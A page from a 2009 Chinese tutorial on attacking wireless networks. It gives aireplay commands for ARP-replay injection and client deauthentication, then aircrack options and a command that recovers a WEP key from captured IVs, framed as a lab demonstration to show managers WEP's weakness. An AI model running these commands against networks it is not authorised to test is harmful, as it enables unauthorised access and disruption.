WEB开发网
开发学院网络安全安全技术 攻击无线网络 阅读

攻击无线网络

 2009-03-10 13:56:14 来源:WEB开发网   
核心提示: aireplay -3 -b APMAC -h CLIENTMAC -x 500 DEVICE前面的命令告诉Aireplay监听来自指定客户端MAC地址的ARP请求,并转向指定的WAP MAC地址,攻击无线网络(3),然后是广播从你的无线NIC上每秒请求500次,现在就可以执行解除认证攻击

aireplay -3 -b APMAC -h CLIENTMAC -x 500 DEVICE

前面的命令告诉Aireplay监听来自指定客户端MAC地址的ARP请求,并转向指定的WAP MAC地址,然后是广播从你的无线NIC上每秒请求500次。现在就可以执行解除认证攻击了:

aireplay -0 10 -a APMAC -c CLIENTMAC DEVICE

这个命令指定了APMAC,这是你的WAP的MAC地址,CLIENTMAC是客户端的MAC地址,DEVICE是设备名。

捕获IV和破解WEP密钥

当攻击开始后,就会收到一个稳定的数据流。破坏64位的WEP会接收到大约300,000个数据包,而128位WEP则会接收到1,000,000个数据包。为了破解密钥,我们要使用Aircrack。Aircrack可以在数据包捕捉进行时运行。Aircrack的常见选项包括下面几个:

-a [mode 1 or 2] 1=WEP, 2=WPA-PSK

-e [essid] target selection network ID

-b [bssid] target access point’s MAC

-q enable quiet mode

-w [path] path to a dictionary word list (WPA only)

-n [no. bits] WEP key length (64, 128, 152 or 256)

-f [fudge no.] defaults are 5 for 64 bit WEP and 2 for 128 bit WEP

接下来,我用下面的命令执行破解:

aircrack -a 1 -b APMAC dump.ivs

这个将将启动Aircrack,并从dump.ivs文件读取需要的数据。在这个例子中,Aircrack会运行大约35分钟,最后得到下面的结果:

64-bit WEP key "3be6ae1345."

如果企业仍然使用WEP,你可能想要使用你自己的网络安全实验室和WAP来尝试这个技术。当你熟悉这个重复的过程后,你就可以让其他网络团队成员和管理人员进入实验室,这样他们就能够看到WEP是如何被攻击的,以此向他们说明如何提高安全性。这也有效地说明了为什么需要花钱建设实验室。

上一页  1 2 3 4  下一页

Tags:攻击 无线网络

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接